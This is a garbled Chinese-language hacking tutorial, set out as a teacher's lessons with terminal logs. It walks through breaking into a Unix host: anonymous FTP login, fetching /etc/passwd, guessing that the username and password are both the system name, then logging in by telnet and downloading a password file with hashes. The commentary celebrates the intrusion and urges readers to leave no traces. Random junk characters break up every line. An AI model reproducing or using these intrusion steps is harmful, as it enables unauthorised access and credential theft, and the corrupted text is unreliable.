, s/ h( p) l% z) B<HTML> / J! U U" ~0 c- D) v1 ^2 P* Q<HEAD> ( Z, v3 G# p0 O$ B3 w5 y1 r<TITLE>Error</TITLE>6 L" O8 ?$ K2 r) r; T' f/ Y8 Q; p- k
</HEAD> & r" [( F; ]8 r$ {8 |6 X0 B6 d: x: J<BODY> * M# p5 [( t2 m) W/ o<H1>Error 400</H1>/ V- ?+ g0 n4 m
" ]* L! H( D C/ U7 s0 {% J# V5 L
Invalid request "" (unknown method) # y) K: U. m4 Y6 R) `+ B+ E/ R" C$ N- X% g
<P><HR><ADDRESS><A HREF="http://www.w3.org">CERN-HTTPD 3.0A</A></ADDRESS>6 ~+ g9 f& E9 a1 N" r1 K
</BODY>: K1 S' D3 O- G, J, K: J, o
</HTML>' J0 u7 @( ], ^# L+ U" K d
Connection closed by foreign host.9 q' X4 Y) w) l: J# n) B3 O4 R) p0 b0 P
1 a# {, k Y5 D% p8 R* @" d" P* g(哇哩 !! 連密碼都沒(méi)得輸入, 真是..... 再來(lái) !! 要有恒心 !!): G" ?3 X8 a$ D7 i* N
(換 FTP Port 試試)7 s y7 ]# F5 g3 Q) Y8 `
9 d9 \( z. A, }6 Y/ t" q3 Q( ^# g6 zms.hinet.net> ftp 111.222.255.255 8 c* T$ K+ g) Y7 ~$ n. [" f+ K# {" pConnected to 111.222.255.255. - a) m& c8 f# _6 x5 H220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. & ?/ J8 q- }( g7 [2 Y: lName (111.222.255.255:FakeName): anonymous1 |' ?* N! H0 z6 E
331 Guest login ok, send your complete e-mail address as password.* E0 u/ j. t0 H2 \7 l& @- j6 V5 L
Password:: B6 V* P! m, k$ Y; B$ S
230-Welcome, archive user! This is an experimental FTP server. If have any - l1 I# \( m; M( L230-unusual problems, please report them via e-mail to root@cool.com 0 h" Q/ S R8 K- @7 M4 E230-If you do have problems, please try using a dash (-) as the first character : b# f2 d8 ?& l* s3 l7 \. x230-of your password -- this will turn off the continuation messages that may' l# Z$ h) X/ l* Y
230-be confusing your ftp client.5 P/ F0 Q2 _$ k& Y; W" W5 c
230- + V7 Z) y0 J8 I0 P6 \230 Guest login ok, access restrictions apply. - ^3 z/ F q" ]9 o/ c) A' yRemote system type is UNIX.- v4 \5 c6 a* `0 O! W* |
Using binary mode to transfer files. , m/ a6 q+ O. O# x' U3 a 1 D: c9 m5 t' [, m1 D(哇 ! 可以用 anonymous 進(jìn)來(lái)耶!! password 部份輸入 aaa@ 就好了 ! 1 d- b5 V0 P* p, b; V- D# H Y不要留下足跡喔!!)6 y2 R! l8 c8 s1 a
4 o* \# P3 F& ~0 Pftp> ls , K4 z8 P- ~! W0 B2 G200 PORT command successful. , F' S& O: S6 p150 Opening ASCII mode data connection for file list. % D# k! G' r! ^$ R7 X b+ k! O# ^etc 4 K) k9 {8 K' c v" k# ?pub * Q+ [$ _; ]0 h- G" O. Susr 7 O2 D2 }% K( \( Ubin 1 `# M6 p: n0 x% M. ]lib Y! ]- { I0 d. Jincoming 8 R5 l/ j6 [; Y) A- Q8 `* F0 vwelcome.msg : J, E0 u/ e+ r$ i ~226 Transfer complete.9 h7 ~" ?7 S( H" a, E8 d6 j# y% ~7 ^
4 a% B: \) J# N& G2 c" d(嗯嗯... 太好了 ! 進(jìn)來(lái)了 !! 下一個(gè)目標(biāo)是.....)2 H0 r8 y2 p" O% c5 g C
( Q, ]2 R3 P0 J, z3 }, N; S
ftp> cd etc 1 L- _, g3 U- S3 O0 |9 G250 CWD command successful. ) D. T" }! D q1 j" D3 Kftp> get passwd (抓回來(lái) !!) & r, h X3 L, u200 PORT command successful.3 @* S: I( q1 x8 R, T+ p
150 Opening BINARY mode data connection for passwd (566 bytes). & m" X6 Z$ Z1 _ l226 Transfer complete.1 u8 G( i* Q% K t; D* C
566 bytes received in 0.56 seconds (0.93 Kbytes/s)' B* [1 B% Q: R7 v; Q2 u! Q; {
(喔... 這麼容易嗎??)2 H9 a% ~& u, @. x; V3 q" @( X
ftp> !cat passwd (看看 !!!)* C% J2 z! e/ L" _) t
root::0:0:root:/root:/bin/bash ) r1 E! h2 [' m; _2 e- h+ u, ibin:*:1:1:bin:/bin: 0 F; S/ a b6 j. C1 ~" K1 W3 a2 jdaemon:*:2:2:daemon:/sbin: 0 g d% x8 I0 s) O' O1 Oadm:*:3:4:adm:/var/adm: 7 G5 o# R; G7 ]9 N+ s6 V2 hlp:*:4:7:lp:/var/spool/lpd: 9 |; K$ r4 P- `) x) j4 @sync:*:5:0:sync:/sbin:/bin/sync1 ]* Q- L4 l" m( t! n
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown ! V" _+ k" ~9 A0 h# Vhalt:*:7:0:halt:/sbin:/sbin/halt + U# P0 ?! z1 h' C( t( o5 pmail:*:8:12:mail:/var/spool/mail:; u2 P7 Y/ a9 z: d" P
news:*:9:13:news:/var/spool/news:; y! m( Z9 x3 H O8 R
uucp:*:10:14:uucp:/var/spool/uucp: ' ]' o, u. c8 L# ]1 G, loperator:*:11:0:operator:/root:/bin/bash 1 _) U0 e" z, x! f& z! Lgames:*:12:100:games:/usr/games:5 `: K- {- j+ b6 D) b7 P
man:*:13:15:man:/usr/man:8 X/ U% J( O( D# Q
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash1 I" s" p( W2 A ?" f5 L4 t
ftp:*:404:1::/home/ftp:/bin/bash% J/ m( b5 ~6 O) a
9 X& l& X1 f) Y& [# L(哇哩... 是 Shadow 的... 真是出師不利.... ) / V0 p' s+ u; O$ R6 q3 \+ p4 ?5 ]6 M& ~, |
ftp> bye# m2 F' W$ r& j' g6 a
221 Goodbye. 2 T& d) q, h( V6 { * y3 A, Q; b* L( f: l) b(不信邪.... 還是老話, 要有恒心....) . a* C _7 f0 N$ ~3 \(FTP 不行, 再 Telnet 看看 !!) 9 e; `0 V9 s% L) r $ E/ I5 _4 x5 H- Y2 M8 Nms.hinet.net> telnet www.fuckyou.hinet.net. `, N" ?( F4 b
Trying 111.222.255.255...1 k( ?1 V( G/ L9 M1 i
Connected to cool.fuckyou.hinet.net. , k* V& `- R: {6 i& nEscape character is '^]'. " W) O& K- k7 m1 O& h. qPassword: $ @' J3 y3 Y* p* D0 HLogin incorrect % \) h+ G& ^ `1 I, a5 j/ a7 ^. {! e$ _0 s2 ?! r5 n, ^1 v1 J |) K( y
(又猜錯(cuò) !!) 1 {& V8 b- Z" y5 g( j7 q, ] * X; Z7 m/ c; n% ]cool login: fuckyou J# h" a7 W) _+ tPassword:/ v; V u- I, Y/ d% W. L( z" s
Last login: Mon Dec 2 09:20:07 from 205.11.122.12 ( S2 f0 Z" C! B% O: LLinux 1.2.13.3 ^( _2 k- }, C+ i6 E5 x
4 K3 F- h P0 A9 M7 v9 T
Some programming languages manage to absorb change but withstand % s [8 o4 p a5 s% _) |progress.& B$ |- X5 g% w# x! H
) P' t- s+ j9 t5 n4 ]! ocool:~$ ' F5 n; b( }7 d& {4 a8 Q- i$ y8 ^. g1 r' E1 c% }
(哇哈哈 !! 哪個(gè)笨 root, 用 system name 作 username 連 : y- A& P2 {0 {# S5 mpassword 也是 system name.... 總算... 沒(méi)白玩...)8 t6 o v" M+ M3 ^) X( I
0 n* K, `: q, P( t
cool:~$ system: I x3 n& w& s6 B6 g+ i
bash: system: command not found ; S ^" q9 W' ?" e3 E7 c3 `4 j; w4 g0 b- a$ A- H
(嗯... 這個(gè) user 的權(quán)限好像不大....)- `" f% \( K! l( u
- r6 h* d% s Q( w! Y
cool:~$ ls3 I5 k8 v% @+ C3 z4 V7 y/ _
cool:~$ pwd; S% Q. U* R7 w# {2 M
/home/fuckyou; s, F" v5 ?7 e
cool:~$ cd /2 p V! ]8 F& W( b2 t
cool:/$ ls/ X* d4 A' ~ h2 {: B
Public/ cdrom/ lib/ mnt/ tmp/ www/ % C1 o! r+ @# t3 S* S' Q/ _2 [" LREADME dev/ linux* proc/ usr/" x7 A; |- d' T- {! c& c
bin/ etc/ local/ root/ var/. {" v/ S; z0 A
boot/ home/ lost+found/ sbin/ 8 {7 b) ~' i9 H5 E# E3 S
cool:/$ cd etc $ X$ M! }0 G! S& @8 B- vtelnet> quit2 [ h0 q; O7 F
(好想睡呀 !! 不玩了 !! 下節(jié)課再開(kāi)始....) $ n: U- b& v5 lConnection closed. ; l4 E. y; \3 I2 O' xms.hinet.net> exit 7 a& i0 K; G! j _/ t2 N& y( t5 l" I2 I A" K5 U
(走了 !! 下節(jié)課在見(jiàn)啦 !! 今天就上到這里 ! 老師要先下班了 !!)# P! f1 y0 H0 Z- e3 H, E# v
(有學(xué)生說(shuō): 騙人! 還沒(méi)有破解呀!! 胡說(shuō) ! 不是已經(jīng)進(jìn)來(lái)了嗎 ???: `5 H- u: K3 L8 I+ ^0 r: P; l0 O
看看這節(jié)課上的是甚麼??? ---->進(jìn)入主機(jī) !! 嗯.....) ], p. |3 K. T* y- o# r) X5 S7 U2 q1 y0 I: q
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-5 g8 o+ @, K* m- I2 u4 p3 g# D4 `& w5 R
How 2. 6 t3 x. P2 t: |9 J, s: a% }5 z3 n+ C. S( A+ f7 Z( N* T6 ~
上節(jié)課抓回來(lái)一個(gè) "亂七八糟" 的 /etc/passwd, 你以為我的真那麼笨嗎?? guest 所抓回來(lái)的能是甚麼好東西?? 所以這一節(jié)課繼續(xù)上次的攻擊行動(dòng). 上節(jié)課我們已經(jīng) "猜" 到了一個(gè)不是 guest 的 username 及 password. 今天就以它來(lái)進(jìn)入主機(jī)瞧瞧!!7 ~" m& t N5 p' Q% Z. s/ Y
- \/ G! e& W, }" v7 b* L* o- \Digital UNIX (ms.hinet.net) (ttypa) " h* H. g) }; C 4 S0 q- H! m0 I; K1 k8 n0 z1 alogin: FakeName q* M; s8 @- C
Password: 8 J1 r3 {, k$ zLast login: Mon Dec 2 03:24:00 from 255.255.0.0. c' w4 u- u: g$ i% Q1 _$ |
" P4 }7 \/ s1 D: r8 C. ^# pDigital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 19968 s% E0 I8 K0 T
Digital UNIX V1.2C Worksystem Software (Rev. 248) & W' V& l0 H+ E0 o# c- Y( oDigital UNIX Chinese Support V1.2C (rev. 3)" R3 X% _* D* [/ M) r6 C1 a
9 N0 c, `/ G0 L5 M' g$ V+ W(嗯... 進(jìn)來(lái)了 ! 開(kāi)始攻擊吧 ! 本次的目標(biāo)是.....呵...)3 O8 e2 q* n X8 x( b5 U
( X/ S9 W' `( C# W5 s2 e
ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 試試看.... 昨天的位址,& K( k: [9 {5 X$ m
有作筆記吧!)5 c* R$ F. H% N. N
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net ' ?1 \$ Z; `1 f& o8 UTrying 111.222.255.255... . y/ b1 m+ R' E l8 {9 l# dConnected to cool.fuckyou.hinet.net. + _2 i; r! _$ L5 t fEscape character is '^]'.3 F3 s6 n& P% ]" e
Password:1 E7 J9 l) j' z+ H
Login incorrect7 B. C- D, P, c3 G' M) g
& x6 @, U) }9 s0 N' Q4 k. i9 F
cool login: fuckyou; ]& w5 J9 m, i) u
Password: (一樣輸入 fuckyou)1 l" M$ {9 H& Q9 J3 r/ g* E$ h i
Last login: Mon Dec 1 12:44:10 from ms.hinet.net 5 v0 z3 N$ W0 _Linux 1.2.13. $ o3 e* [ g" f; V/ {* |8 n- H$ ]; l" M: S% `; M: n: A
cool:~$ cd /etc+ |4 N c+ f* ]" s
cool:/etc$ ls* D1 m1 @3 T: q$ z r2 Z7 e
DIR_COLORS ftpusers localtime resolv.conf& r- D1 i4 o8 g( s8 `' m
HOSTNAME gateways magic rpc! E; K" k0 u, V: S4 f
NETWORKING group mail.rc securetty3 E6 m2 K& ?' p
NNTP_INEWS_DOMAIN host.conf motd sendmail.cf3 G1 D$ P9 d9 Z" f
X11@ hosts messages/ sendmail.st4 C2 ~: }( [( ]. x8 J* W5 s
XF86Config hosts.allow mtab services ' e: A7 r9 p/ S5 C5 E4 q- u, Tat.deny hosts.deny mtools shells2 g! |1 {: X; G a! g% c
bootptab hosts.equiv named.boot shutdownp 6 `$ Z ^+ F, [7 O8 c+ x* lcsh.cshrc hosts.lpd networks snoopy/, V; b% M6 h/ u6 q g
csh.login httpd.conf nntpserver slip.hosts - q" A( T# A# `9 Cexports inetd.conf passwd snooptab & ?; @1 v1 A( N& p: Z$ Tfastboot inittab passwd.OLD syslog.conf $ A9 z4 q* I8 afdprm issue passwd.old syslog.pid' _1 K6 U* ^' ?& |+ P# B
fstab ld.so.cache printcap ttys # J8 l, |. | C7 d3 Gftpaccess ld.so.conf profile utmp@; d: m& o" e' Y- T
, Z" _. U$ I# p- ?4 ~* K(找尋目標(biāo)..... 太亂了 ! 懶得找, 再來(lái) ....) 4 m9 y9 p/ T: c3 a$ Y8 p6 Tcool:/etc$ ls pa* 6 S" `4 e* @) v0 p% H0 Z# Hpasswd passwd.OLD passwd.old; j- e2 T ]% J e, G' I3 ~& ~: W
2 `4 M, O/ P: _7 u+ m* _- W5 J* q
(果然在) : w1 G1 {8 ~9 }% q8 i& m* ^ 1 }1 n3 u( s ]$ }, icool:/etc$ more passwd % S5 O5 X! o: |! s0 i6 R3 d(看看有沒(méi)有 Shadow...)) K1 ]5 m9 p5 j' d. J: C
& h8 \" T ^. g1 u: E4 E
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash& v, T) i1 U; Z4 c
john:234ab56:9999:13:John Smith:/home/john:/bin/john % G" ^5 m, P) U4 X* B. c4 V# y7 D! P- ^$ G I1 Z
(正點(diǎn) ! 一點(diǎn)都沒(méi)有防備 !!) # P0 Y% @- G* e5 ocool:/etc$ exit + O( S% T+ ~0 @logout: K5 P, o2 h) i) X
(走了!.... 換 FTP 上場(chǎng) !!) & c S$ a) h- I Y4 |* H0 u8 CConnection closed by foreign host.. s& ~6 Y' ~0 S( ]$ e3 |
ms.hinet.net> ftp www.fuckyou.hinet.net . B. d1 E; w5 ?6 kConnected to cool.fuckyou.hinet.net.2 @/ b2 e4 k. e, ~$ {% Q' \* f
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. 7 _8 U3 m5 j$ `3 f+ [! w' GName (www.fuckyou.hinet.net:66126): fuckyou! t: ?& m4 w1 v) U
331 Password required for fuckyou. 2 U; U p J# s3 |. s) P, e8 m: @Password:) d4 k) m; R: i( W! f
230 User fuckyou logged in.8 Q( p7 S* D3 K3 @+ M4 D2 @
Remote system type is UNIX.. o* R7 |6 y7 W, U
Using binary mode to transfer files. ) R" H3 U n1 P- S+ F# m; m, _8 d# A7 l
ftp> cd /etc& E; H* n6 i% W* Z K7 Z
250 CWD command successful. - v! \& w8 e* i4 {% Q* @9 F3 {, Xftp> get passwd# ^( _0 K% b8 r+ h$ n# q1 b' b
200 PORT command successful. , e8 o5 m/ {2 _: _- \2 p150 Opening BINARY mode data connection for passwd (350 bytes).+ @4 c9 p5 G+ X8 o" [3 O3 `
226 Transfer complete.' E7 F! |# z) X) m6 j$ J% V
350 bytes received in 0.68 seconds (1.9 Kbytes/s)/ w) O( o. W7 j8 B, s9 t. d+ w